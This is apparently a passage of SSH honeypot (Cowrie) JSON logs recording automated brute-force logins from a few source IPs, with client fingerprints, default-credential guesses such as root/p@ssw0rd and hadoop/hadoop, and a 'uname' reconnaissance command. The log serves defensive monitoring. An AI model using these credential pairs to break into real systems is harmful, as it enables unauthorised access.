{"eventid":"cowrie.login.failed","username":"netdata","password":"netdata","message":"login attempt [netdata/netdata] failed","sensor":"my-vps","timestamp":"2025-08-26T11:26:09.388705Z","src_ip":"212.227.125.160","session":"86828ab2c312"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:26:10.362855Z","src_ip":"83.168.105.65","session":"22ffc7f20f4a"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:26:10.440098Z","src_ip":"212.227.125.160","session":"86828ab2c312"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57042,"dst_ip":"1.2.3.4","dst_port":22,"session":"1b5daf5a8d9e","protocol":"ssh","message":"New connection: 212.227.125.160:57042 (1.2.3.4:22) [session: 1b5daf5a8d9e]","sensor":"my-vps","timestamp":"2025-08-26T11:26:14.253135Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:26:14.254481Z","src_ip":"212.227.125.160","session":"1b5daf5a8d9e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:26:14.310132Z","src_ip":"212.227.125.160","session":"1b5daf5a8d9e"}
{"eventid":"cowrie.login.success","username":"root","password":"1234567890","message":"login attempt [root/1234567890] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:26:14.799925Z","src_ip":"212.227.125.160","session":"1b5daf5a8d9e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:26:15.112249Z","src_ip":"212.227.125.160","session":"1b5daf5a8d9e"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T11:26:15.113101Z","src_ip":"212.227.125.160","session":"1b5daf5a8d9e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:26:15.175881Z","src_ip":"212.227.125.160","session":"1b5daf5a8d9e"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:26:15.176880Z","src_ip":"212.227.125.160","session":"1b5daf5a8d9e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57808,"dst_ip":"1.2.3.4","dst_port":22,"session":"299d66419a72","protocol":"ssh","message":"New connection: 212.227.125.160:57808 (1.2.3.4:22) [session: 299d66419a72]","sensor":"my-vps","timestamp":"2025-08-26T11:26:21.017170Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:26:21.144335Z","src_ip":"212.227.125.160","session":"299d66419a72"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:26:21.145022Z","src_ip":"212.227.125.160","session":"299d66419a72"}
{"eventid":"cowrie.login.success","username":"root","password":"p@ssw0rd","message":"login attempt [root/p@ssw0rd] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:26:22.136412Z","src_ip":"212.227.125.160","session":"299d66419a72"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:26:22.429700Z","src_ip":"212.227.125.160","session":"299d66419a72"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T11:26:22.430363Z","src_ip":"212.227.125.160","session":"299d66419a72"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:26:22.481414Z","src_ip":"212.227.125.160","session":"299d66419a72"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:26:22.482472Z","src_ip":"212.227.125.160","session":"299d66419a72"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":51082,"dst_ip":"1.2.3.4","dst_port":22,"session":"2b5598b690f4","protocol":"ssh","message":"New connection: 83.168.105.65:51082 (1.2.3.4:22) [session: 2b5598b690f4]","sensor":"my-vps","timestamp":"2025-08-26T11:26:24.680846Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:26:24.681792Z","src_ip":"83.168.105.65","session":"2b5598b690f4"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:26:24.718210Z","src_ip":"83.168.105.65","session":"2b5598b690f4"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"hadoop","message":"login attempt [hadoop/hadoop] failed","sensor":"my-vps","timestamp":"2025-08-26T11:26:24.829445Z","src_ip":"83.168.105.65","session":"2b5598b690f4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58372,"dst_ip":"1.2.3.4","dst_port":22,"session":"24c5a13fe227","protocol":"ssh","message":"New connection: 212.227.125.160:58372 (1.2.3.4:22) [session: 24c5a13fe227]","sensor":"my-vps","timestamp":"2025-08-26T11:26:25.717073Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:26:25.831771Z","src_ip":"212.227.125.160","session":"24c5a13fe227"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:26:25.867157Z","src_ip":"83.168.105.65","session":"2b5598b690f4"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:26:26.139600Z","src_ip":"212.227.125.160","session":"24c5a13fe227"}
{"eventid":"cowrie.login.failed","username":"lighthouse","password":"lighthouse","message":"login attempt [lighthouse/lighthouse] failed","sensor":"my-vps","timestamp":"2025-08-26T11:26:26.889394Z","src_ip":"212.227.125.160","session":"24c5a13fe227"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:26:28.045295Z","src_ip":"212.227.125.160","session":"24c5a13fe227"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59348,"dst_ip":"1.2.3.4","dst_port":22,"session":"008924a0763e","protocol":"ssh","message":"New connection: 212.227.125.160:59348 (1.2.3.4:22) [session: 008924a0763e]","sensor":"my-vps","timestamp":"2025-08-26T11:26:31.746784Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:26:31.747835Z","src_ip":"212.227.125.160","session":"008924a0763e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:26:31.803219Z","src_ip":"212.227.125.160","session":"008924a0763e"}
{"eventid":"cowrie.login.success","username":"root","password":"!Qaz@Wsx","message":"login attempt [root/!Qaz@Wsx] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:26:31.961581Z","src_ip":"212.227.125.160","session":"008924a0763e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:26:32.083237Z","src_ip":"212.227.125.160","session":"008924a0763e"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T11:26:32.083900Z","src_ip":"212.227.125.160","session":"008924a0763e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:26:32.135670Z","src_ip":"212.227.125.160","session":"008924a0763e"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:26:32.136675Z","src_ip":"212.227.125.160","session":"008924a0763e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60116,"dst_ip":"1.2.3.4","dst_port":22,"session":"ca64d8194011","protocol":"ssh","message":"New connection: 212.227.125.160:60116 (1.2.3.4:22) [session: ca64d8194011]","sensor":"my-vps","timestamp":"2025-08-26T11:26:37.714266Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:26:37.715171Z","src_ip":"212.227.125.160","session":"ca64d8194011"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:26:37.783847Z","src_ip":"212.227.125.160","session":"ca64d8194011"}
{"eventid":"cowrie.login.failed","username":"developer","password":"developer","message":"login attempt [developer/developer] failed","sensor":"my-vps","timestamp":"2025-08-26T11:26:38.398349Z","src_ip":"212.227.125.160","session":"ca64d8194011"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:26:39.493891Z","src_ip":"212.227.125.160","session":"ca64d8194011"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":34436,"dst_ip":"1.2.3.4","dst_port":22,"session":"245573c707c5","protocol":"ssh","message":"New connection: 196.251.86.249:34436 (1.2.3.4:22) [session: 245573c707c5]","sensor":"my-vps","timestamp":"2025-08-26T11:26:40.117840Z"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":45890,"dst_ip":"1.2.3.4","dst_port":22,"session":"0467935b1379","protocol":"ssh","message":"New connection: 83.168.105.65:45890 (1.2.3.4:22) [session: 0467935b1379]","sensor":"my-vps","timestamp":"2025-08-26T11:26:40.290293Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:26:40.290987Z","src_ip":"83.168.105.65","session":"0467935b1379"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:26:40.327161Z","src_ip":"83.168.105.65","session":"0467935b1379"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"!QAZ@WSX","message":"login attempt [oracle/!QAZ@WSX] failed","sensor":"my-vps","timestamp":"2025-08-26T11:26:40.440566Z","src_ip":"83.168.105.65","session":"0467935b1379"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:26:40.843460Z","src_ip":"196.251.86.249","session":"245573c707c5"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T11:26:40.844237Z","src_ip":"196.251.86.249","session":"245573c707c5"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:26:41.479154Z","src_ip":"83.168.105.65","session":"0467935b1379"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"passpass","message":"login attempt [hadoop/passpass] failed","sensor":"my-vps","timestamp":"2025-08-26T11:26:42.743929Z","src_ip":"196.251.86.249","session":"245573c707c5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60886,"dst_ip":"1.2.3.4","dst_port":22,"session":"48ce2b1bf89f","protocol":"ssh","message":"New connection: 212.227.125.160:60886 (1.2.3.4:22) [session: 48ce2b1bf89f]","sensor":"my-vps","timestamp":"2025-08-26T11:26:43.714372Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:26:43.851084Z","src_ip":"212.227.125.160","session":"48ce2b1bf89f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 